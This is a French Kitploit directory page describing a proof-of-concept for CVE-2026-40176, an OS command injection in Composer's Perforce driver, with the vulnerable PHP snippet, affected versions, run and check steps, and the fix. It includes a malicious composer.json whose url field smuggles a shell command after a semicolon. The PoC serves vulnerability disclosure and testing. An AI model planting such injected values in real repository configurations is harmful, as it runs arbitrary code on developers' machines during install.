Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-40176-poc — Exploit de preuve de concept pour CVE-2026-40176, une injection de commande OS dans le pilote Perforce VCS de Composer permettant l'exécution de code à distance via un fichier composer.json malveillant. | Kitploit
Outils/GitHubGitHub/saku0512/cve-2026-40176-poc
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCommandement et ContrôleApprentissage et ÉducationDéveloppement de Charges Utiles
GitHubsaku0512/cve-2026-40176-poc

CVE-2026-40176-poc

Exploit de preuve de concept pour CVE-2026-40176, une injection de commande OS dans le pilote Perforce VCS de Composer permettant l'exécution de code à distance via un fichier composer.json malveillant.

Voir le dépôt
2il y a 1 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-40176: Preuve de concept d'injection de commande OS Composer Perforce

English version

Aperçu

Ce dépôt est une preuve de concept (PoC) de la vulnérabilité critique d'injection de commande OS CVE-2026-40176 présente dans le pilote Perforce VCS de Composer. Cette vulnérabilité affecte les versions de Composer antérieures à 2.2.27 et 2.9.6.

La vulnérabilité se trouve dans la méthode Perforce::generateP4Command(). Lors de la construction de la commande shell, les valeurs de configuration du dépôt telles que url, p4user, client ne sont pas suffisamment assainies, ce qui permet à un attaquant, via un composer.json contrôlé, d'exécuter des commandes arbitraires au moment où la victime exécute composer install ou composer update.

Découvreur : saku0512 (GitHub)

Avertissement

Ce projet est destiné uniquement à des fins éducatives et à des tests de sécurité éthiques autorisés.

L'auteur décline toute responsabilité en cas d'utilisation abusive, de dommages ou d'activités illégales liés à cet outil. L'accès non autorisé à des systèmes informatiques est illégal. En utilisant ce logiciel, vous acceptez de n'effectuer des tests de sécurité que dans des environnements pour lesquels vous avez obtenu une autorisation explicite.

Détails de la vulnérabilité

  • CVE ID: CVE-2026-40176
  • Type: Injection de commande OS (CWE-78)
  • Impact: Exécution de code à distance (RCE)
  • Versions affectées:
    • Composer 2.0.0 <= v2.2.26
    • Composer 2.3.0 <= v2.9.5
  • Version corrigée: v2.2.27 / v2.9.6

Cause racine

Dans la méthode generateP4Command() de src/Composer/Util/Perforce.php, la commande shell est construite en concaténant directement les chaînes provenant de la configuration du dépôt.

root@kitploit:~
$p4Command = $this->getP4Executable().' ';
$p4Command .= '-u ' . $this->getUser() . ' ';   // エスケープされていない
if ($useClient) {
    $p4Command .= '-c ' . $this->getClient() . ' '; // エスケープされていない
}
$p4Command .= '-p ' . $this->getPort() . ' ' . $command; // エスケープされていない

Si ces valeurs contiennent des métacaractères shell tels que ;, &, |, ils sont interprétés par le shell, ce qui conduit à une injection de commande.

Utilisation du PoC

1. Préparation de l'environnement

Assurez-vous que PHP est installé. Ce PoC reproduit la logique vulnérable interne de Composer.

root@kitploit:~
# PHPのバージョン確認
php -v

2. Exemple de configuration (composer.json malveillant)

Un attaquant peut créer un composer.json comme suit :

root@kitploit:~
{
    "repositories": [
        {
            "type": "perforce",
            "url": "localhost:1666; touch /tmp/pwned_rce_confirmed #",
            "depot": "depot"
        }
    ],
    "require": {
        "some/package": "dev-master"
    }
}

3. Exécution du PoC

Le poc.php fourni reproduit la logique interne de génération et d'exécution de commandes des versions vulnérables de Composer.

root@kitploit:~
# PoCを実行
php poc.php

4. Validation

Vérifiez si le fichier créé par la charge utile existe pour confirmer que la commande a été exécutée.

root@kitploit:~
ls -l /tmp/pwned_rce_confirmed
# ファイルが存在する場合、RCEが成立したことを確認できます。

Mesures correctives

Mettez à jour Composer immédiatement vers la dernière version.

root@kitploit:~
composer self-update

Le correctif applique ProcessExecutor::escape() à tous les arguments provenant de l'utilisateur pour empêcher leur interprétation par le shell.

Références

  • CVE-2026-40176 (cve.org)
  • Composer Security Advisory
Télécharger l’outil